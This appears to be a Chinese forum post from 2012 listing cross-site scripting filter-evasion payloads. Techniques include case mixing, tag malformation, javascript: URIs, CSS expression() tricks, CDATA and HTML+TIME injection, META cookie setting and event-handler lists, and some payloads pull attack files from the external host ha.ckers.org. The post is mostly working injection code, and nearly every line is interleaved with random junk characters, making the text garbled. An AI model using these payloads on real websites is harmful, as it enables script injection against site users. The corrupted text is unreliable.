1. 改变字符大小写5 g4 ~* t# I- s2 a$ d
$ J1 Y1 q, C v8 J6 n) w2 U
$ ^4 I" k7 R8 z. ~( O3 S7 |
8 u, V' G. U8 k5 }# s! g' ^ <sCript>alert(‘d’)</scRipT>
3 M9 c: E: ]1 }
! n4 p5 `1 i, z! X/ i2. 利用多加一些其它字符来规避Regular Expression的检查2 r# p" b1 L% I% j$ L
; _; ^) [" E# ] <<script>alert(‘c’)//<</script>/ V ^9 \! h: @ h4 c; z
3 o0 k2 C2 [0 ^! d
<SCRIPT a=">" SRC="t.js"></SCRIPT>
+ O$ ~, z' Z$ N7 N, P$ \, m' ?- u9 T
<SCRIPT =">" SRC="t.js"></SCRIPT>
9 J) c7 l" c6 L& c: J
9 K K% b! W" v2 t( W4 n- a <SCRIPT a=">" ” SRC="t.js"></SCRIPT>1 m2 L9 L) @9 a T! c7 X
& M0 K# m% U3 [" `$ N- E& ^ <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>' \$ D4 `! g' ] u
5 Q* Q0 a, j; U+ P/ } <SCRIPT a=`>` SRC="t.js"></SCRIPT>
" Z; a# M0 U4 x: n/ E( K7 M7 H* g8 `, z
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
" z/ O) H5 P5 ?0 D! W9 F. Q, C9 X" j- [# K5 ?
3. 以其它扩展名取代.js
, B4 A* a. J& C2 D3 u" x4 m3 X! w% I7 l, E3 t \7 Y' V$ [$ V# }
<script src="bad.jpg"></script>& P1 w" m& J) i7 j1 x' p) c' e& f
; b' X% G% t0 H9 |) q s, t
4. 将Javascript写在CSS档里1 g. m4 ?4 B+ C, \9 h6 o0 c7 U1 H
6 b) D" G) J) I3 c6 u8 \ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
n2 c, @9 }1 D1 ^9 ^0 v2 ?/ N T; J# j% D
example:8 Z% F7 z4 Q; y0 u: H
3 c U g# o$ V9 U$ @8 ?
body {
" g7 o- I3 m6 |' o" y/ C; |2 S, G" @7 N
background-image: url(‘javascript:alert("XSS");’)$ R6 k* U8 n8 k! r4 y
( y" M7 ~' j4 `- N1 p! K) ?; I }( X8 q" u: i. V, [1 i d
6 ~* B* I: E" U# T, x4 c
5. 在script的tag里加入一些其它字符. N8 s, s- X$ F& I
* N* g& f1 {5 z o/ v" g7 |
<SCRIPT/SRC="t.js"></SCRIPT>
) f, v ~" ^% A- `% k; I2 c) T$ q0 H `5 ~% Y" D# l
<SCRIPT/anyword SRC="t.js"></SCRIPT>
/ @, L3 [- z0 B0 S
4 S( f4 X) A) M9 E6. 使用tab或是new line来规避8 n d6 A) g" N2 I8 P( W
1 c# |$ V4 a- E# m9 { <img src="jav ascr ipt:alert(‘XSS3′)">
+ R8 y, z! F% q$ i4 B0 i; j
% v6 G, Z7 q5 F( E; C K <img src="jav ascr ipt:alert(‘XSS3′)">) J5 y4 G: U2 l* ^' C
, V4 P& P2 T7 O' c" P
<IMG SRC="jav ascript:alert(‘XSS’);">
0 X+ Q& T! ?- c7 ^$ y
7 ]: ?' q" W- u+ x# } -> tag2 |- O. @/ Z3 d1 [
, j0 q2 Y" M# E% S6 p
-> new line: l! R; b( L* O
4 Y8 D$ h; T! w- x t7. 使用"\"来规避( m, R) J/ b/ _+ j* @( b
( m3 {( j2 T2 Q <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>7 S/ f( R; L& a" h! ~9 L+ X1 d) h
+ n& s, M; W( ]( V( f
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>6 y& d/ t: X/ y2 R. @/ a- J& R6 u
! d! \) s/ D& _( s- ~- N9 J$ k/ h
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">- l2 t$ P' O+ b, O+ S4 t2 I2 w$ G
; P" `: u( ~5 m# I; Q( o
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 r2 [3 P0 N& p! ?3 P% ~8 h& H
. o5 O2 g0 u6 z ?1 A9 I2 B* d <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>4 I) ^+ W+ d$ b3 H. w' `7 }
7 W6 @ F( f( P. R$ l! i8. 使用Hex encode来规避(也可能会把";"拿掉)
) L& R2 u* X9 g* m+ M3 N. r% |' z* v4 r0 H
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"> d5 ]( G' K% g, j# z6 v; q
. i+ }# S. ~0 e* s& P 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) r4 l* B8 ~# _
3 G* V3 X/ H* K
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
1 X( D: Y! _0 l# o: s. i* o- R5 ^+ d4 `0 R5 @4 B
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">$ g1 U9 [. Y0 m2 \, X
5 d* `5 Y( P3 \) g; B4 d# ^9. script in HTML tag
9 p2 [0 k% [' d p( H* M
" t/ T! B& U3 a1 ?0 p7 }; f <body onload=」alert(‘onload’)」>$ s0 i( Y+ y$ v- E @0 U/ {
7 Y2 I# \" h% x/ k
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload2 O6 l* u8 `- j# f- p5 o
. \. d$ b* U# r, W/ O6 L, f10. 在swf里含有xss的code
1 s$ U& _ _# s" y* J. ~
6 j0 Y7 N# o, D/ `9 d <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
, `. d5 H& S. o! D' Z2 x$ q& t) Z: A0 s8 ?: @) J# |$ X$ W2 s( S" `
11. 利用CDATA将xss的code拆开,再组合起来。
/ u j8 ?8 t& D
" }/ P' Z. f% i0 z9 t' x0 \ <XML ID=I><X><C>
" q s A) b+ A0 o1 q l1 |( V6 V) G8 {: c' ^' F$ |, ?0 n
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>9 K$ y) a+ m' _+ J' B( y$ l5 {' I
: D+ p( z5 U$ T4 G" h2 L </C></X> a/ Y& j" {: x* }/ ?
# [) J1 m. i9 v* Y" M& ?. u3 H </xml>5 p- T( {& l( P9 B* f
" ^8 P/ S! s I5 E0 q+ c
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>) X! I1 v# Z, Y8 @, `8 W
. [6 E+ p0 ~# F% T/ m# H" l; u) T d
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
7 w+ P* m0 I4 ?- z1 E; i% Y9 ^
* a& `; R# T8 @: ? <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
0 ~2 a7 h8 W' R1 C4 I5 i* e- K3 \2 c
12. 利用HTML+TIME。2 D& B) x* u2 |$ \- D J
0 P" N D8 z" f' Z8 S8 M6 d5 X3 j
<HTML><BODY>
) W( v, H0 Z5 n4 w7 l) G: F8 m% l" X! Y3 e \5 V
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">* C% O7 N- a+ r: U6 {* ?3 f& x# _
3 y1 b( ?# W7 l" T <?import namespace="t" implementation="#default#time2">3 ^3 o8 h7 t1 i. Z( ^8 F9 c4 X
0 K9 N3 b; e. c% R) H6 v6 U
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">7 M: V, K( {0 \
- {( J' L4 j. v" y. \' j" w0 J
</BODY></HTML>
4 ^4 `5 o' ?! c, l @8 R
' o1 i7 R. l7 o% J# _/ `13. 透过META写入Cookie。4 Q( C6 o8 @" M( b
3 n. c" f, l A% b
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
" T, ^( ~# p: |& u' |, G, N* I
0 S5 @5 ]7 |. S& p% s# [7 w0 o% B8 @2 J14. javascript in src , href , url
& |: q( `# e$ [5 b- P Z- K: E$ q3 p0 G: {# l
<IFRAME SRC=javascript:alert(’13′)></IFRAME>* Y9 }$ u0 F" N- i
; Y4 Z9 W$ M4 H2 [$ [, c <img src="javascript:alert(‘XSS3′)">" ?* C. m! s5 U+ D6 y+ K0 W8 \! \
! Z: L& U- r3 C( D ~# z<IMG DYNSRC="javascript:alert(‘XSS20′)">8 P0 d# ^. V2 J) D
8 i8 N1 ?6 {- i) o, F7 ~ <IMG LOWSRC="javascript:alert(‘XSS21′)">) G+ M0 M3 r- |: |! ]
+ M- |' P' W7 \$ y7 e2 ]/ o
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">. W( m/ N# P7 T Q& `# ^
y6 [: B8 [1 T7 S4 @ <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
! t. {. W" ]* G6 c/ u0 V, [7 H L' {/ m" I, b. p. g& {
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">; \, o8 l, R" x: F, y ? b& G
6 d7 s+ g! ?+ _1 `! a% }: N# B
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">7 I# d9 I% o: n
0 o5 L4 k& L# w7 ~, D
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}* o% y2 s9 M# k! ^" g) p4 e
/ Y1 S' U5 M, J- j8 a/ @& t. L/ Q p; y
</STYLE><A CLASS=XSS></A>3 {. r/ Q! s" q' X$ \. ?8 P
5 M; L ^$ O, e5 S7 S: R
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>$ j, a3 S9 `; _6 R# k% O7 Q a0 W9 _
5 w U4 O" W8 o7 m8 W4 N
|
发表于 2012-12-31 09:59:28
收藏
支持
反对